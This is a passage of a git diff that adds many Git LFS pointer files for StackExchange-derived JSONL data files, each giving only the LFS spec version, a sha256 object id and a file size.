+1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bed1f345d513b9224d8663a6152f63c61cfc02f14f3db089df69b1c7d6fce413 +size 37513895 diff --git a/data/stackexchange/1-1/1381_2289.jsonl b/data/stackexchange/1-1/1381_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0f09d6fd2f3b33e1ca2f79a5ff273733195f515 --- /dev/null +++ b/data/stackexchange/1-1/1381_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0d5a72caf6dee11e18244255e2940398b4bcd4be6c8bb27e5836cac54809f456 +size 37474123 diff --git a/data/stackexchange/1-1/1382_2289.jsonl b/data/stackexchange/1-1/1382_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18e86b0f7913c62c8df14c147994478852bd9663 --- /dev/null +++ b/data/stackexchange/1-1/1382_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a4590fb6202e180ce423ec0ec72e50bf3601460462f1112e6bd62069aa013f64 +size 37193656 diff --git a/data/stackexchange/1-1/1383_2289.jsonl b/data/stackexchange/1-1/1383_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e6780469f642be70948cc619e55e965dfe9895e8 --- /dev/null +++ b/data/stackexchange/1-1/1383_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ef81ba2de7f991f6b4f75ec2ca56b22384021805eb2432b4457f9014f89654b0 +size 36889906 diff --git a/data/stackexchange/1-1/1384_2289.jsonl b/data/stackexchange/1-1/1384_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2b06576f549c411ec65fe3f26b5e630319c67a3d --- /dev/null +++ b/data/stackexchange/1-1/1384_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e7b33688b2c6f3da252d882fca3808b2e649fa432b2ded41ddf3a52bce03893a +size 37552359 diff --git a/data/stackexchange/1-1/1385_2289.jsonl b/data/stackexchange/1-1/1385_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3e834452247cfead27e53b14de94f0019a76db69 --- /dev/null +++ b/data/stackexchange/1-1/1385_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b00cbd95c3b524b44fbd6a25aee342b6fb3759645a70d3c5f45b5aced43396d +size 37125947 diff --git a/data/stackexchange/1-1/1386_2289.jsonl b/data/stackexchange/1-1/1386_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a2fc9dff6888370489a7a300ce1607b2fc0c8998 --- /dev/null +++ b/data/stackexchange/1-1/1386_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f68e26a3667bb618e0c01ff54c93c78125b81bff8e297bf481c8b42c3808cef2 +size 37021526 diff --git a/data/stackexchange/1-1/1387_2289.jsonl b/data/stackexchange/1-1/1387_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..240f07fe4a51e7ceff1417c5fe46a7fdd74c7d54 --- /dev/null +++ b/data/stackexchange/1-1/1387_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:df401446298e9056b1242ce457eeea8653379d57eee395c68d0be3e6b88a0f72 +size 37065342 diff --git a/data/stackexchange/1-1/1388_2289.jsonl b/data/stackexchange/1-1/1388_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..af3d70ab93f96d73dee5f311ed3a599e303faf42 --- /dev/null +++ b/data/stackexchange/1-1/1388_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5f380a95dd3828287db38df4d37f3e5568545cd478e60a6632f318d33041ba29 +size 37320221 diff --git a/data/stackexchange/1-1/1389_2289.jsonl b/data/stackexchange/1-1/1389_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..03945469c9ccf74591b89cc10e7b65330c8d5887 --- /dev/null +++ b/data/stackexchange/1-1/1389_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80d48f676871678243461796828728c609d09c4a8ca5400bc539d87d9bbeb9d7 +size 36497831 diff --git a/data/stackexchange/1-1/138_2289.jsonl b/data/stackexchange/1-1/138_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cb3ec7b6593ba6423fefda0c50d3d538bba746e0 --- /dev/null +++ b/data/stackexchange/1-1/138_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc656d743ce36776867a0253a02dca50fc67fe6e1102638cc1a5c8cc8d8f2a8d +size 34196100 diff --git a/data/stackexchange/1-1/1390_2289.jsonl b/data/stackexchange/1-1/1390_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..da0bd3547701e396091ace51b6e3f825583e6dd3 --- /dev/null +++ b/data/stackexchange/1-1/1390_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d08b3dffb3044de2d0d3a5f28b8892ea8859d9f4a575114eb63d4a5df1a4230a +size 36333620 diff --git a/data/stackexchange/1-1/1391_2289.jsonl b/data/stackexchange/1-1/1391_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5162896046f137df2cdb4c3febe02bd30285c221 --- /dev/null +++ b/data/stackexchange/1-1/1391_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f137d8e498073e3640d89965c1063503396749ebb5b70d8871f1b561c771d896 +size 36257476 diff --git a/data/stackexchange/1-1/1392_2289.jsonl b/data/stackexchange/1-1/1392_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6fcab29846ce6e28e7921c31b5c826bd8736a180 --- /dev/null +++ b/data/stackexchange/1-1/1392_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:81289713296512e80d589816d2a0405762543075c56da9751d0f1307b4ee7f67 +size 35896524 diff --git a/data/stackexchange/1-1/1393_2289.jsonl b/data/stackexchange/1-1/1393_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7451d1b2daa13fbaedd366b609a579c9fab4a50b --- /dev/null +++ b/data/stackexchange/1-1/1393_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d21441964e7991740c6cb4b7710288aa36c18babcaebea58e8f68bdd048ea6ad +size 37036770 diff --git a/data/stackexchange/1-1/1394_2289.jsonl b/data/stackexchange/1-1/1394_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e31f5e28b2c080bd81f076bca84462d24153f48 --- /dev/null +++ b/data/stackexchange/1-1/1394_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0f54d249515f96db833d060830254812d36680a4745477b80cf284eb6aa7e0fe +size 36738114 diff --git a/data/stackexchange/1-1/1395_2289.jsonl b/data/stackexchange/1-1/1395_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8e41f1bc8b0457cc51e7a05f3d3bbb59ff37ac63 --- /dev/null +++ b/data/stackexchange/1-1/1395_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a72a91660f6250cd662ea77a7056a0274a7a7def737e098cdd6f0a3437af9c48 +size 36610736 diff --git a/data/stackexchange/1-1/1396_2289.jsonl b/data/stackexchange/1-1/1396_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c2dd52d576e183f6ffb5ea5c95d017a1c52cfa61 --- /dev/null +++ b/data/stackexchange/1-1/1396_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:998defb20a62fbee5d4397fe6a25f50af044db8195f8d1fa3335edddb9a3ca02 +size 36309833 diff --git a/data/stackexchange/1-1/1397_2289.jsonl b/data/stackexchange/1-1/1397_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d987aa2f928845de0a48e0b8713df98b898e5d79 --- /dev/null +++ b/data/stackexchange/1-1/1397_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d2a8bca188cdda666f4fb9742bb78af09552b096caf0777c6c85782d8747f189 +size 37214864 diff --git a/data/stackexchange/1-1/1398_2289.jsonl b/data/stackexchange/1-1/1398_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b7085c10ba7f09b6bc718334b97e8259df227fd8 --- /dev/null +++ b/data/stackexchange/1-1/1398_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51be511bd73b9096e96a7b3a22ac53224a7d081efa367201e6ae78cd961beee4 +size 36666661 diff --git a/data/stackexchange/1-1/1399_2289.jsonl b/data/stackexchange/1-1/1399_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1bc1fd62ff09267897500a9aa0cf96077e8ce379 --- /dev/null +++ b/data/stackexchange/1-1/1399_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8d34827baf022c7e63bf8bf35927f384ed339cda6060aee1cbd63839a986cab +size 36755548 diff --git a/data/stackexchange/1-1/139_2289.jsonl b/data/stackexchange/1-1/139_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..96f9674ffb987cd9d914ee6449d8f732ebf2bf14 --- /dev/null +++ b/data/stackexchange/1-1/139_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:633c01d571a40fcc4b0688e9ed2e061adaae886e7823e2d69fc381ed913de7b4 +size 33522414 diff --git a/data/stackexchange/1-1/13_2289.jsonl b/data/stackexchange/1-1/13_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8994544564127301b6867b6b4dcfa80aff659c61 --- /dev/null +++ b/data/stackexchange/1-1/13_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c36f8109e10c67f82160505965ffeea7844088a2926f1a9556604ee43ec67e13 +size 35986610 diff --git a/data/stackexchange/1-1/1400_2289.jsonl b/data/stackexchange/1-1/1400_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..985bc5fb178e99636a3c5a9664dd74de451e02b9 --- /dev/null +++ b/data/stackexchange/1-1/1400_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2e795fe0786655d611aed16ed03ef763aad2d1b9bdaced6593709caec8c40b69 +size 36749251 diff --git a/data/stackexchange/1-1/1401_2289.jsonl b/data/stackexchange/1-1/1401_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..534250b4adc457655889559aecb20f0841625a13 --- /dev/null +++ b/data/stackexchange/1-1/1401_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b35395ae358e61772ed8b9922021639d347b37199305fca11fb661a309f1495 +size 36703111 diff --git a/data/stackexchange/1-1/1402_2289.jsonl b/data/stackexchange/1-1/1402_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5de72f1862f13184cd26130d6099477d2c8d8554 --- /dev/null +++ b/data/stackexchange/1-1/1402_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:085bafc961a5ae26e12181cb2523af8fe7b04ee38843a54024b6ebad37458975 +size 36195975 diff --git a/data/stackexchange/1-1/1403_2289.jsonl b/data/stackexchange/1-1/1403_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..49dc05e1bf7447172125f18c38b8ab09653944bb --- /dev/null +++ b/data/stackexchange/1-1/1403_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:43bf76b0b8c1941cd672c366bf74593875f0032b8ced41fbb222144183c088d0 +size 37223362 diff --git a/data/stackexchange/1-1/1404_2289.jsonl b/data/stackexchange/1-1/1404_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..79e33ec9d6087045b7f24f8a4a5d232e79a71ece --- /dev/null +++ b/data/stackexchange/1-1/1404_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e0f43e3c4b1d4b4d2339762779e77eaceac38d2d593a10a4481de74799fe419 +size 36197058 diff --git a/data/stackexchange/1-1/1405_2289.jsonl b/data/stackexchange/1-1/1405_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4e3e114434570c0998d54ec70bc1cefb87aa7347 --- /dev/null +++ b/data/stackexchange/1-1/1405_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:169748d36ab7355de2317cdb51a8130ba400065b0ad8a65552ff5c5957799c2c +size 36174206 diff --git a/data/stackexchange/1-1/1406_2289.jsonl b/data/stackexchange/1-1/1406_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..78a94df2f516d6d0a1aa026f4966cc9b5a4aa1cb --- /dev/null +++ b/data/stackexchange/1-1/1406_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f46dd848cf6c96cf4e9fc2c1c9d3cc23afaf9e869b80b2248c6fb20b34e1362 +size 36734647 diff --git a/data/stackexchange/1-1/1407_2289.jsonl b/data/stackexchange/1-1/1407_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0d08b7b7a1e5eedeeae14f6dc50e2fad0f29a582 --- /dev/null +++ b/data/stackexchange/1-1/1407_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dd2d3290610ed095778c25101733b72f88ef8272a7213322d9429f227489015d +size 36461417 diff --git a/data/stackexchange/1-1/1408_2289.jsonl b/data/stackexchange/1-1/1408_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b8846e1bbf4c1509e0e8e511ecb61dedaa02193d --- /dev/null +++ b/data/stackexchange/1-1/1408_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0eae122464b5a6ba0d3ed909c08b717695d40614af3c78d0bac84221105013de +size 37441449 diff --git a/data/stackexchange/1-1/1409_2289.jsonl b/data/stackexchange/1-1/1409_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1948a8ec8730e23db8f21e8decc9201a0f6b05cf --- /dev/null +++ b/data/stackexchange/1-1/1409_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a647c2f9c782a3759d8b58a8b42999ed17ac9fbf68f11e9b7b9f0ba0539fcaa +size 36762831 diff --git a/data/stackexchange/1-1/140_2289.jsonl b/data/stackexchange/1-1/140_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e94c8aec63ee7c1e061d72ed38c3363d4aded51e --- /dev/null +++ b/data/stackexchange/1-1/140_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea6b1e71648e05cf0091e5c05b7c5353c8a26244777a7a6bdcbc4a0cbd63e337 +size 33764071 diff --git a/data/stackexchange/1-1/1410_2289.jsonl b/data/stackexchange/1-1/1410_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..02e0dabcbae60b0cac99e3bf4c5ea5b6513c7739 --- /dev/null +++ b/data/stackexchange/1-1/1410_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:024d505b74e053b2f2c51ca60bddc1a17ed321dd087ba465758b779311885760 +size 36903720 diff --git a/data/stackexchange/1-1/1411_2289.jsonl b/data/stackexchange/1-1/1411_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..811e90ad2ea1b00e270187e8ad1a951cf7fe2a92 --- /dev/null +++ b/data/stackexchange/1-1/1411_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:13a4f9100b7fd1d866874d7f4b07cdcfb78835f183894a76712f2c0c221f4bb5 +size 36509095 diff --git a/data/stackexchange/1-1/1412_2289.jsonl b/data/stackexchange/1-1/1412_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d788001b23fb7dddad812d4cff1ac15a34416685 --- /dev/null +++ b/data/stackexchange/1-1/1412_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a10fba9e609c8c7f1f180fc9f2770958701216fc8bd2241311afadafdbbe4a70 +size 37081287 diff --git a/data/stackexchange/1-1/1413_2289.jsonl b/data/stackexchange/1-1/1413_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d38cfea0b351931cf81cf4c0af835059563fffa2 --- /dev/null +++ b/data/stackexchange/1-1/1413_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:adc6e24e821aa4d9e25722c78f9678ed843f3284bb5d2ce0802b1dcd7c86ce18 +size 37307804 diff --git a/data/stackexchange/1-1/1414_2289.jsonl b/data/stackexchange/1-1/1414_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..51eb525e42421c6192d1ab0fc89cba0698da025d --- /dev/null +++ b/data/stackexchange/1-1/1414_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7bf1729965b83801b487c898c8acf27de3a08f259b4465cf5d123d045480bf14 +size 36467591 diff --git a/data/stackexchange/1-1/1415_2289.jsonl b/data/stackexchange/1-1/1415_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..027c8abad852bcb794181461958ec79d868fcdf6 --- /dev/null +++ b/data/stackexchange/1-1/1415_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1e3415e6e077f94f4bb39122fecc501fe75a3b2a310d6d36bd711e9612a45217 +size 35743506 diff --git a/data/stackexchange/1-1/1416_2289.jsonl b/data/stackexchange/1-1/1416_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..efdeb4bc2d6ef67bf63fe0c1c90ae2d813514f8a --- /dev/null +++ b/data/stackexchange/1-1/1416_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:856d7f102b16a1791d31a0d3b475a1ac9385bd6566bc2ac4bfaf57c525918440 +size 36897238 diff --git a/data/stackexchange/1-1/1417_2289.jsonl b/data/stackexchange/1-1/1417_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..45b730872c75b449dbc3be0164fc628b22c18cd5 --- /dev/null +++ b/data/stackexchange/1-1/1417_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0714d4469e8ea67dc561436b88e2eafa465e301e8273963461db0dbc0750f416 +size 36701116 diff --git a/data/stackexchange/1-1/1418_2289.jsonl b/data/stackexchange/1-1/1418_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6b98b6fdef65344b30a70d1e148f339d1cd6c4bb --- /dev/null +++ b/data/stackexchange/1-1/1418_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46f524f843dd4917387328eb26b3f061b8640e446b741aa7f99034c6ac7dafc2 +size 36714597 diff --git a/data/stackexchange/1-1/1419_2289.jsonl b/data/stackexchange/1-1/1419_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e1c08b1f6c03bd977fb3469e4081c3c1f4bf28d4 --- /dev/null +++ b/data/stackexchange/1-1/1419_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3965c4159e3bd26dc1bdb84081d20a4d0c73100b20eef8a0bf1647971885b3db +size 36678238 diff --git a/data/stackexchange/1-1/141_2289.jsonl b/data/stackexchange/1-1/141_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5957ef9c2b8baae6b4650c614344f27fae5a19b0 --- /dev/null +++ b/data/stackexchange/1-1/141_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:666b4435154b863d3ade98fc6105c384de8f0a24c39e5418f4a19a970927681c +size 33975966 diff --git a/data/stackexchange/1-1/1420_2289.jsonl b/data/stackexchange/1-1/1420_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4652a22a9add28381dd43994a201252f204f4a93 --- /dev/null +++ b/data/stackexchange/1-1/1420_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:36ddf152ef6ff694b486719d60ccab8732045e086264eaf716d597aa92ddacce +size 36311566 diff --git a/data/stackexchange/1-1/1421_2289.jsonl b/data/stackexchange/1-1/1421_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dafa7e9b870aa2d5ff498f4c2269d5a2b8a8e6be --- /dev/null +++ b/data/stackexchange/1-1/1421_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e3c1d9b7e8e12b85094c0cde6b8ec39463fef7a51496b03f0bbaefdfdbc892d +size 36632041 diff --git a/data/stackexchange/1-1/1422_2289.jsonl b/data/stackexchange/1-1/1422_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1627db87cbbda33b5e47ca0130ccb0cebc65aa7f --- /dev/null +++ b/data/stackexchange/1-1/1422_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:09b67bf234a6351c065a48ed99a54315ead2689a5d4fbd2c734e5084d555d7ad +size 37071339 diff --git a/data/stackexchange/1-1/1423_2289.jsonl b/data/stackexchange/1-1/1423_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d8a06f914f5f1f270e15040df164715da8e0e789 --- /dev/null +++ b/data/stackexchange/1-1/1423_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d90bd60f1173f786ae6b3eb3ce3ce482d57f07333d187502daa138f5e2f07a59 +size 37212914 diff --git a/data/stackexchange/1-1/1424_2289.jsonl b/data/stackexchange/1-1/1424_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d9730d89d4546d0d8fdf15f983cde14d01d08427 --- /dev/null +++ b/data/stackexchange/1-1/1424_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:32dbe04f04cd035c8e139eda47353e7042d32f6848b26ed34006ab399a6e2ca9 +size 36812814 diff --git a/data/stackexchange/1-1/1425_2289.jsonl b/data/stackexchange/1-1/1425_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..97178410dd4e3b04832eb716133da34fed84c76f --- /dev/null +++ b/data/stackexchange/1-1/1425_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:98d0f1de9b053779afb53bc8bd1a18d6c73f384697b3cf50952ecd8126769b21 +size 36882964 diff --git a/data/stackexchange/1-1/1426_2289.jsonl b/data/stackexchange/1-1/1426_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..136a96eddfae0a1d7ae7d533030e67c27ba1d0a4 --- /dev/null +++ b/data/stackexchange/1-1/1426_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9c97b34a4236f8a28dcfb4022b3f279cc101a37f01945ca6a179ad62faf7e349 +size 36142916 diff --git a/data/stackexchange/1-1/1427_2289.jsonl b/data/stackexchange/1-1/1427_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..964b2cc4dce0d65a5d4b34dfe123f99358284604 --- /dev/null +++ b/data/stackexchange/1-1/1427_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0db3a2641cf08bb1bd76c80da5b5a6f4b0a40cd7b8559ea14516a0974e410f2 +size 37365035 diff --git a/data/stackexchange/1-1/1428_2289.jsonl b/data/stackexchange/1-1/1428_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f52e3f32660f37f039d2437203bc9d30a1e640fd --- /dev/null +++ b/data/stackexchange/1-1/1428_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4720f2a1c2404503a76efd4b658d6643b26a2adea81f040953dbf8f8b9495316 +size 36542530 diff --git a/data/stackexchange/1-1/1429_2289.jsonl b/data/stackexchange/1-1/1429_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8a58e975357f793ac35e91c9744f554cc8a02bc2 --- /dev/null +++ b/data/stackexchange/1-1/1429_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:461dc67c85c5703d0ccc8cd26e1e2e7484b9e15828691feed2fb5a6da822f4fb +size 36392917 diff --git a/data/stackexchange/1-1/142_2289.jsonl b/data/stackexchange/1-1/142_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c263b7d972d3df274b27e487074d9ae12e7f26bf --- /dev/null +++ b/data/stackexchange/1-1/142_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d0be9c7e29cb33951332c148d9e49cacc60e58938fea0c23d209f19078d1a5c3 +size 33579137 diff --git a/data/stackexchange/1-1/1430_2289.jsonl b/data/stackexchange/1-1/1430_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2502f298e1cf6b8a68e3177140e0f06d5e45fd81 --- /dev/null +++ b/data/stackexchange/1-1/1430_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:003710490d7cb5e86e7f5e9fa983c9d2a689073d965f4c92fb97c3fc7f79911b +size 37195336 diff --git a/data/stackexchange/1-1/1431_2289.jsonl b/data/stackexchange/1-1/1431_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b8e20bc229433b9c7cc05b79d6570e4ba555ff7a --- /dev/null +++ b/data/stackexchange/1-1/1431_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94f1272245daae25f3ec02ffad5ccafef24a274827884a9ce69c16d6787388c6 +size 37826399 diff --git a/data/stackexchange/1-1/1432_2289.jsonl b/data/stackexchange/1-1/1432_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83a59b4151875e320ab117f4998e7b763839e4e2 --- /dev/null +++ b/data/stackexchange/1-1/1432_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d5f528b9e50e3268a457a5ffa6b7e5f62ba63d01b699638b6beb39d31aba31a4 +size 36556645 diff --git a/data/stackexchange/1-1/1433_2289.jsonl b/data/stackexchange/1-1/1433_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..003d1fbe810dbabe3cfb1e1e8f36d169e3b5a5e2 --- /dev/null +++ b/data/stackexchange/1-1/1433_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec15906409f6f4d4669555a3cb76575fa785d34ead8ee74fe844a09dece6f882 +size 36460229 diff --git a/data/stackexchange/1-1/1434_2289.jsonl b/data/stackexchange/1-1/1434_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..99e39b5f9bf61c9146426396abc6e755c6bfe182 --- /dev/null +++ b/data/stackexchange/1-1/1434_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:90fc83944a9eea1d6cf11e7b3b077a06c5338acec4b63b6ae9bf37c237e864e8 +size 36381520 diff --git a/data/stackexchange/1-1/1435_2289.jsonl b/data/stackexchange/1-1/1435_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9b0e6835826de1dd06a299f4e1b7906d52bba94b --- /dev/null +++ b/data/stackexchange/1-1/1435_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:63d650cc76669f2a10da57b6bd31e7f1ef89b4363f6bf2baf3abf4e6b0c7a55c +size 36338101 diff --git a/data/stackexchange/1-1/1436_2289.jsonl b/data/stackexchange/1-1/1436_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..60a8648e09198a00e6aedf825945e439884e4911 --- /dev/null +++ b/data/stackexchange/1-1/1436_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5542d05d8c83057b52044e8e0d0dfa7f2c40396bcdffe2a08165403451e1d688 +size 36660004 diff --git a/data/stackexchange/1-1/1437_2289.jsonl b/data/stackexchange/1-1/1437_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..70999e86ea2de8b0c8d91fd8d75aab0305bb4f55 --- /dev/null +++ b/data/stackexchange/1-1/1437_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f8260989684bd47ac246542f2cdc75bb118abaaa1e1ee50638e12847dd77ba6 +size 36819659 diff --git a/data/stackexchange/1-1/1438_2289.jsonl b/data/stackexchange/1-1/1438_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1be6efac5e911bc62d6112c79afc2da3e9b26e1d --- /dev/null +++ b/data/stackexchange/1-1/1438_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:47bd79d063f8fe2d43efdfafd8c549b609d74108eafeb5f2e563b33a4d582812 +size 36441029 diff --git a/data/stackexchange/1-1/1439_2289.jsonl b/data/stackexchange/1-1/1439_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..068841078c26d3d02465773a8cf1de6d41e52aa8 --- /dev/null +++ b/data/stackexchange/1-1/1439_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 